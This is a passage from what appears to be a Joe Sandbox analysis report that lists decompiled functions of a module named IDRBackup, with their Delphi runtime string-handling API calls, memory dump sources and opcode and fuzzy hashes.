                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A238), ref: 5001A1E8
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A238), ref: 5001A1FC
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A238), ref: 5001A206
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001A238), ref: 5001A213
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: String$System@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Internal$Compare
                                                                                                  • String ID:
                                                                                                  • API String ID: 1952152088-0
                                                                                                  • Opcode ID: 60bac2dbcf486b484fd8edb7a338e1cfbf0ddd4389093eb7d5b855bee5dfed36
                                                                                                  • Instruction ID: 7aa712e8d9422046bf6ebc41a1e60e2c3364a706724e098922e2a107fb2dba3f
                                                                                                  • Opcode Fuzzy Hash: 60bac2dbcf486b484fd8edb7a338e1cfbf0ddd4389093eb7d5b855bee5dfed36
                                                                                                  • Instruction Fuzzy Hash: 27217270A41299AFEF01DFB8DC9299EB7F8EF55210F904672EA40A7245E7709E80D690
                                                                                                  Function 50016A84 Relevance: 12.1, APIs: 8, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AA8
                                                                                                    • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                    • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                    • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AC1
                                                                                                    • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AC9
                                                                                                    • Part of subcall function 5001B48C: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120 ref: 5001B497
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AE1
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016AE9
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016B07
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016B3E,?,?,00000000,00000000,00000000,00000000), ref: 50016B0F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$FromString$Char$qqrr20StringbSysutils@$Int$qqrx20$AnsiInternalStr$qqrr20Stringx20Stringx27System@%T$us$i0$%$Asg$qqrr20Cat$qqrr20CharLen$qqrr20Long$qqrx20Soundex$qqrx20Str$qqriStringiStringpbiStringriStrutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1727032514-0
                                                                                                  • Opcode ID: 9544c1ba6febaeb11602175b13897d1a00f0a9f904f52e82c35a4ea79f3a4763
                                                                                                  • Instruction ID: 73112111d8c23333898401fd14fec3439d1d4c23f5a36a265c86c13f67aa07f8
                                                                                                  • Opcode Fuzzy Hash: 9544c1ba6febaeb11602175b13897d1a00f0a9f904f52e82c35a4ea79f3a4763
                                                                                                  • Instruction Fuzzy Hash: 98119370B051489FDB04EFE4DC929EEB3A6EBD4210B55C376A9008374AEB38AE459694
                                                                                                  Function 5000D4C4 Relevance: 12.1, APIs: 8, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4E2
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4F4
                                                                                                    • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                    • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                    • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D4FD
                                                                                                  • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D508
                                                                                                    • Part of subcall function 5000CE0C: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,?,?,5000D50D,?,00000000,5000D54A), ref: 5000CE34
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D519
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D525
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 5000D52F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$Asg$qqrr20Stringx20$Length$qqrr20Stringi$AnsiByteCharChar$qqrx20Clr$qqrpvFromMem$qqrrpviMultiReallocStr$qqrr20Stringx27System@%T$us$i0$%Unicode$qqrpbuipcuiUtf8Wide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1178600862-0
                                                                                                  • Opcode ID: f46a319949a0f8be63f242d61074621778d9a0e6e5d67ca0fbb5c852c94508df
                                                                                                  • Instruction ID: b68bba9100bf9d62a181cd0ba84c1bf9c83d5d046ee87d3bee0c1ba5abf9dfab
                                                                                                  • Opcode Fuzzy Hash: f46a319949a0f8be63f242d61074621778d9a0e6e5d67ca0fbb5c852c94508df
                                                                                                  • Instruction Fuzzy Hash: 26016830601AC8ABFB10CFB5DCB299EB7EADF95204BE08A73F80087111EA30DE01C590
                                                                                                  Function 5000B2CC Relevance: 10.6, APIs: 7, Instructions: 109COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B31F
                                                                                                  • @System@@WStrAsg$qqrr17System@WideStringx17System@WideString.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B336
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B34D
                                                                                                  • @System@@CopyArray$qqrv.RTL120(?,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B386
                                                                                                  • @System@@CopyRecord$qqrv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B39A
                                                                                                  • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B3B5
                                                                                                  • @System@@DynArrayAsg$qqrv.RTL120(?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?,?,?,?), ref: 5000B3CB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$CopyDelphiInterface$t17StringSystem@%UnicodeWide$ArrayArray$qqrvAsg$qqrpvpxvAsg$qqrr17Asg$qqrr20Asg$qqrvCopy$qqrr45Interface%Interface%x45IntfRecord$qqrvStringx17Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2237906399-0
                                                                                                  • Opcode ID: b04e6cb788995e5d8afb73564426f797f1c67d65cb384e711102801db3d5bd43
                                                                                                  • Instruction ID: 17e68543b33f0793b23223b217cdc46ee77ba68b7f488055d9e3e5e4418e0c98
                                                                                                  • Opcode Fuzzy Hash: b04e6cb788995e5d8afb73564426f797f1c67d65cb384e711102801db3d5bd43
                                                                                                  • Instruction Fuzzy Hash: 0B31C2B2B049988BF3207A49ECB179AF3D2AB94314FF54336D649D3312D671EE119681
                                                                                                  Function 50027BBC Relevance: 10.6, APIs: 7, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 50027BD1
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027CD0), ref: 50027BFE
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027CD0), ref: 50027C38
                                                                                                  • @Sysutils@NextCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027CD0), ref: 50027C55
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50027CD0), ref: 50027C8D
                                                                                                  • @Sysutils@NextCharIndex$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,50027CD0), ref: 50027CA8
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50027CD7), ref: 50027CCA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AnsiStringSystem@%System@@$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Internal$CharIndex$qqrx27NextSysutils@T$us$i0$%i$Clr$qqrpvRef$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 360761928-0
                                                                                                  • Opcode ID: 094be7fb4b332f3584b311a85b3cf5a89501829387b4e68e140eca991bc94513
                                                                                                  • Instruction ID: 116a533da1986bff42e015f6ef194d79bf04bfc9b8e4ea4b873e8cb7479415cf
                                                                                                  • Opcode Fuzzy Hash: 094be7fb4b332f3584b311a85b3cf5a89501829387b4e68e140eca991bc94513
                                                                                                  • Instruction Fuzzy Hash: D7316030A06186DFCB11DF78EA915BDB7F5FF44300B6046BAE448D7256D771AE409B90
                                                                                                  Function 5000B440 Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B4C0
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B4DF
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5000B53E), ref: 5000B4F5
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B47B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B53E), ref: 5000B512
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%Unicode$Internal$Move$qqrpxvpvi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2269240621-0
                                                                                                  • Opcode ID: 07a4e3b2a30b5038fec9cdcacff2e7d97685f54e4cb4140f115b55e76aca54ed
                                                                                                  • Instruction ID: ab6cb9ca280b5cfd23ec245c9f52380a76360824adbb00bdbbb02a50cc25d4fa
                                                                                                  • Opcode Fuzzy Hash: 07a4e3b2a30b5038fec9cdcacff2e7d97685f54e4cb4140f115b55e76aca54ed
                                                                                                  • Instruction Fuzzy Hash: 11318E30700689DBBB11EFA8DAA266DB3F8EF49300BA046B5E601D7256E7B4DF40D750
                                                                                                  Function 5001C3F4 Relevance: 10.6, APIs: 7, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                  • @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Char$qqrx20Scan$qqrpxbbSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3324498720-0
                                                                                                  • Opcode ID: bf26a2b97ca58175508d886ed96bf389f4343cc66bbe0e155038a7790a10b8fe
                                                                                                  • Instruction ID: e1cde9bc071b440c39512abc6ffcd83c64075ec29b59cb21d599069659e6d0c2
                                                                                                  • Opcode Fuzzy Hash: bf26a2b97ca58175508d886ed96bf389f4343cc66bbe0e155038a7790a10b8fe
                                                                                                  • Instruction Fuzzy Hash: 6621F530A046D9EFDB11CFA8DD6297DB3F8EF94620BA04266E90197255E734DE80D680
                                                                                                  Function 50015AC8 Relevance: 10.6, APIs: 7, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B01
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,50015B90), ref: 50015B12
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50015B90), ref: 50015B19
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B38
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50015B90), ref: 50015B65
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Char$qqrx20Length$qqrr20Stringi
                                                                                                  • String ID:
                                                                                                  • API String ID: 1537914859-0
                                                                                                  • Opcode ID: 1e13e7f021d760450b2d22ee9921c6ee7e773aeb530b874d90593081222a90d2
                                                                                                  • Instruction ID: c8b1f13dae7ebe80b3f85388a8d19f916493298cae09e507b059e2df6187fb7d
                                                                                                  • Opcode Fuzzy Hash: 1e13e7f021d760450b2d22ee9921c6ee7e773aeb530b874d90593081222a90d2
                                                                                                  • Instruction Fuzzy Hash: CF218030B0428ADFEB11DFB8DDD196AB3F9EF4820076042B6E601DB255E770DE81D644
                                                                                                  Function 500285BC Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028602
                                                                                                  • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028622
                                                                                                    • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 5002776B
                                                                                                    • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277A2
                                                                                                    • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277D2
                                                                                                    • Part of subcall function 5002772C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277F8
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028648
